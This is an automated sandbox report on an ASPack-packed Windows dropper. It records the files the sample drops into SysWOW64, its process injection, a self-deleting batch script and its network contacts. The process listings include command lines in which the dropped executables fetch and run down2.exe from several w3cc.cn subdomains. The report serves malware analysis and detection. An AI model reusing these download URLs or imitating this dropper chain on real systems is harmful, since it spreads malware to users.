Malware Analysis Report

2025-08-11 01:26

Sample ID 240229-hjjt3she77
Target adf042c909d919ccca72d1bcf7338e71
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
Tags
aspackv2
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd

Threat Level: Shows suspicious behavior

The file adf042c909d919ccca72d1bcf7338e71 was found to be: Shows suspicious behavior.

Malicious Activity Summary

aspackv2

Executes dropped EXE

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Runs ping.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-29 06:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-29 06:45

Reported

2024-02-29 06:48

Platform

win7-20240221-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

Signatures

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\yXvPpK.exe N/A
N/A N/A C:\Windows\SysWOW64\CjQlMj.exe N/A
N/A N/A C:\Windows\SysWOW64\McooHs.exe N/A
N/A N/A C:\Windows\SysWOW64\DsaQDn.exe N/A
N/A N/A C:\Windows\SysWOW64\gpVDWz.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\yXvPpK.exe C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File opened for modification C:\Windows\SysWOW64\yXvPpK.exe C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\CjQlMj.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\McooHs.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\DsaQDn.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\DelCAD.bat C:\Windows\SysWOW64\CjQlMj.exe N/A
File created C:\Windows\SysWOW64\gpVDWz.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\DelCAD.bat C:\Windows\SysWOW64\McooHs.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DsaQDn.exe
PID 2552 wrote to memory of 1540 N/A C:\Windows\SysWOW64\CjQlMj.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 N/A C:\Windows\SysWOW64\CjQlMj.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 N/A C:\Windows\SysWOW64\CjQlMj.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 N/A C:\Windows\SysWOW64\CjQlMj.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2320 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\gpVDWz.exe
PID 2172 wrote to memory of 848 N/A C:\Windows\SysWOW64\McooHs.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 N/A C:\Windows\SysWOW64\McooHs.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 N/A C:\Windows\SysWOW64\McooHs.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 N/A C:\Windows\SysWOW64\McooHs.exe C:\Windows\SysWOW64\cmd.exe
PID 848 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

C:\Windows\SysWOW64\yXvPpK.exe

"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll

C:\Windows\SysWOW64\CjQlMj.exe

"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\McooHs.exe

"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\DsaQDn.exe

"C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\gpVDWz.exe

"C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 x6.w3cc.cn udp
CN 182.61.201.92:80 x6.w3cc.cn tcp
CN 182.61.201.50:80 x6.w3cc.cn tcp
US 8.8.8.8:53 x2.w3cc.cn udp
CN 182.61.201.50:80 x2.w3cc.cn tcp
CN 182.61.201.90:80 x2.w3cc.cn tcp
CN 182.61.201.90:80 x2.w3cc.cn tcp
CN 182.61.201.91:80 x2.w3cc.cn tcp
US 8.8.8.8:53 x4.w3cc.cn udp
CN 182.61.201.50:80 x4.w3cc.cn tcp
CN 182.61.201.91:80 x4.w3cc.cn tcp
CN 182.61.201.90:80 x4.w3cc.cn tcp
CN 182.61.201.92:80 x4.w3cc.cn tcp
CN 182.61.201.50:80 x4.w3cc.cn tcp
CN 182.61.201.91:80 x4.w3cc.cn tcp
CN 182.61.201.90:80 x4.w3cc.cn tcp
CN 182.61.201.92:80 x4.w3cc.cn tcp

Files

\Windows\SysWOW64\yXvPpK.exe

MD5 adf042c909d919ccca72d1bcf7338e71
SHA1 bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512 d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

\Windows\SysWOW64\CjQlMj.exe

MD5 78cd588e48bf05f83ac4d2e5bd3d32e2
SHA1 c96060325a397b397a1d60076ce6e2c11f309a4f
SHA256 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA512 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

memory/2552-19-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2172-34-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 55ddc7c397dac5382bffc27028613cf2
SHA1 cd1ec3db09b2c87dbc12af0cee2e61c2811b7248
SHA256 7af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1
SHA512 bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026

memory/2552-58-0x0000000000400000-0x0000000000418000-memory.dmp

memory/1592-62-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 3b9f74672e6599f4d582d25049c67775
SHA1 b07fea6b6986218b56665ff196295e53a1ab9028
SHA256 60439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311
SHA512 8791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb

memory/2172-86-0x0000000000400000-0x0000000000418000-memory.dmp

memory/888-90-0x0000000000400000-0x0000000000418000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-29 06:45

Reported

2024-02-29 06:48

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

Signatures

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SOupMF.exe N/A
N/A N/A C:\Windows\SysWOW64\DMWgpy.exe N/A
N/A N/A C:\Windows\SysWOW64\xBjOcu.exe N/A
N/A N/A C:\Windows\SysWOW64\RMsoSA.exe N/A
N/A N/A C:\Windows\SysWOW64\eytYFB.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\DMWgpy.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\xBjOcu.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\RMsoSA.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\DelCAD.bat C:\Windows\SysWOW64\DMWgpy.exe N/A
File created C:\Windows\SysWOW64\eytYFB.exe.tmp C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File created C:\Windows\SysWOW64\DelCAD.bat C:\Windows\SysWOW64\xBjOcu.exe N/A
File created C:\Windows\SysWOW64\SOupMF.exe C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A
File opened for modification C:\Windows\SysWOW64\SOupMF.exe C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\RMsoSA.exe
PID 2700 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\RMsoSA.exe
PID 2700 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\RMsoSA.exe
PID 3096 wrote to memory of 4372 N/A C:\Windows\SysWOW64\DMWgpy.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4372 N/A C:\Windows\SysWOW64\DMWgpy.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4372 N/A C:\Windows\SysWOW64\DMWgpy.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4372 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4372 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2700 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\eytYFB.exe
PID 2700 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\eytYFB.exe
PID 2700 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe C:\Windows\SysWOW64\eytYFB.exe
PID 3884 wrote to memory of 2060 N/A C:\Windows\SysWOW64\xBjOcu.exe C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 2060 N/A C:\Windows\SysWOW64\xBjOcu.exe C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 2060 N/A C:\Windows\SysWOW64\xBjOcu.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

C:\Windows\SysWOW64\SOupMF.exe

"C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll

C:\Windows\SysWOW64\DMWgpy.exe

"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\xBjOcu.exe

"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\RMsoSA.exe

"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\eytYFB.exe

"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 x2.w3cc.cn udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
CN 182.61.201.90:80 x2.w3cc.cn tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
CN 182.61.201.91:80 x2.w3cc.cn tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 x3.w3cc.cn udp
CN 182.61.201.90:80 x3.w3cc.cn tcp
CN 182.61.201.92:80 x3.w3cc.cn tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
CN 182.61.201.91:80 x3.w3cc.cn tcp
CN 182.61.201.50:80 x3.w3cc.cn tcp
US 8.8.8.8:53 x4.w3cc.cn udp
CN 182.61.201.50:80 x4.w3cc.cn tcp
CN 182.61.201.92:80 x4.w3cc.cn tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
CN 182.61.201.90:80 x4.w3cc.cn tcp
CN 182.61.201.50:80 x4.w3cc.cn tcp
CN 182.61.201.90:80 x4.w3cc.cn tcp
CN 182.61.201.91:80 x4.w3cc.cn tcp
CN 182.61.201.91:80 x4.w3cc.cn tcp
CN 182.61.201.92:80 x4.w3cc.cn tcp
US 8.8.8.8:53 214.80.50.20.in-addr.arpa udp

Files

C:\Windows\SysWOW64\SOupMF.exe

MD5 adf042c909d919ccca72d1bcf7338e71
SHA1 bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512 d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

C:\Windows\SysWOW64\DMWgpy.exe

MD5 78cd588e48bf05f83ac4d2e5bd3d32e2
SHA1 c96060325a397b397a1d60076ce6e2c11f309a4f
SHA256 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA512 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 9c439a87b83755cde8511cf65e13e54e
SHA1 a72df147498f15d16d4004f73733d2602390e981
SHA256 d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3
SHA512 c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb

memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 544926ed36528740dfc1d64a602e6d5c
SHA1 7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5
SHA256 6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7
SHA512 8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b

memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp